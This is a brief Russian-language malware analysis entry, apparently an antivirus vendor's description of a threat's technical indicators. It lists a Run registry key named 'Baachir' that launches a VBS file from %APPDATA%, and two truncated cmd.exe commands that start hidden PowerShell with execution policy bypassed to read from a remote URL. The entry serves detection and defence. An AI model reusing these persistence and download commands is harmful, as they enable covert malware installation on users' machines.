Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Baachir' = '"%APPDATA%\<Имя файла>.vbs"'
- %APPDATA%\<Имя файла>.vbs
- '<SYSTEM32>\cmd.exe' /c powershell-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt...